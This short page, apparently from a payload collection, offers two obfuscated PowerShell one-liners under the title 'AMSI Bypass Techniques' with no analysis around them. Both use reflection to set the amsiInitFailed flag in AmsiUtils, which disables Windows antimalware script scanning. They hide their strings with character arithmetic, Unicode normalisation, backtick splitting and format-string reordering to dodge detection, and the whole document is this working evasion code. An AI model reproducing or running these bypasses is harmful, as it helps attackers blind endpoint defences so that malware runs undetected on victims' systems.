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AMSI Bypass Techniques


use to generate AMSI Bypass techniques  
$iu9nUCYfZjO831cZ6=$null;$t9jdZOULRwE6UwvmtJ="System.$([char]([bYTe]0x4d)+[ChAr]([byTe]0x61)+[char]([BYTe]0x6e)+[ChaR](97*82/82)+[CHaR](103*90/90)+[CHar](101*27/27)+[CHaR]([ByTe]0x6d)+[CHar](101)+[chAR]([bYTe]0x6e)+[CHar]([bYtE]0x74)).$(('Âútômâtì'+'ón').NorMAlIZe([ChAR](70*67/67)+[cHaR]([BYTE]0x6f)+[CHaR]([BYTE]0x72)+[ChaR](109*41/41)+[Char](68+8-8)) -replace [cHAR](92*77/77)+[cHaR]([bYTE]0x70)+[cHAr]([BYtE]0x7b)+[CHaR]([bYte]0x4d)+[Char]([bYTe]0x6e)+[ChAR]([Byte]0x7d)).$(('Ãm'+'sî'+'Ût'+'ìl'+'s').norMALIZe([CHAR](70*53/53)+[chAR](111)+[CHar](114)+[CHar]([BYtE]0x6d)+[CHar]([bYte]0x44)) -replace [CHAR]([ByTe]0x5c)+[cHAR]([BYTE]0x70)+[char](123*9/9)+[chaR]([Byte]0x4d)+[ChaR]([byTE]0x6e)+[cHar](125+3-3))";$sxynqfmtovfgaojvecwrzknwdq="+('kphjwgrxthc'+'úkígùõíqfày'+'lî').norMAlIze([CHAR]([byte]0x46)+[Char](68+43)+[chAR]([ByTe]0x72)+[chaR]([byTE]0x6d)+[ChAr](68*32/32)) -replace [ChAr](92)+[char]([bYTe]0x70)+[Char](123*34/34)+[chAr]([BYTe]0x4d)+[chaR](110+53-53)+[chaR]([BytE]0x7d)";[Threading.Thread]::Sleep(1191);[Ref].Assembly.GetType($t9jdZOULRwE6UwvmtJ).GetField($([chAr]([byTE]0x61)+[ChAR]([BytE]0x6d)+[cHaR](115+66-66)+[ChAr](105+41-41)+[chAr](1+72)+[chAR]([byTE]0x6e)+[cHar](105+5-5)+[ChAr](39+77)+[cHaR]([bYTe]0x46)+[CHAr]([bytE]0x61)+[CHAr]([byte]0x69)+[ChAR]([bYtE]0x6c)+[chaR](101)+[CHAR]([Byte]0x64)),"NonPublic,Static").SetValue($iu9nUCYfZjO831cZ6,$true);$ntohzcuavoxziv="+('z'+'p'+'b').norMALIZE([ChAR]([bYTe]0x46)+[ChAR](111+15-15)+[CHAR](83+31)+[cHAR](109+36-36)+[ChaR]([bYTE]0x44)) -replace [chAR]([BYTe]0x5c)+[cHar](91+21)+[chaR]([BYtE]0x7b)+[cHar]([ByTe]0x4d)+[ChaR](89+21)+[cHaR]([Byte]0x7d)";[Threading.Thread]::Sleep(1845)
sET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} ) 





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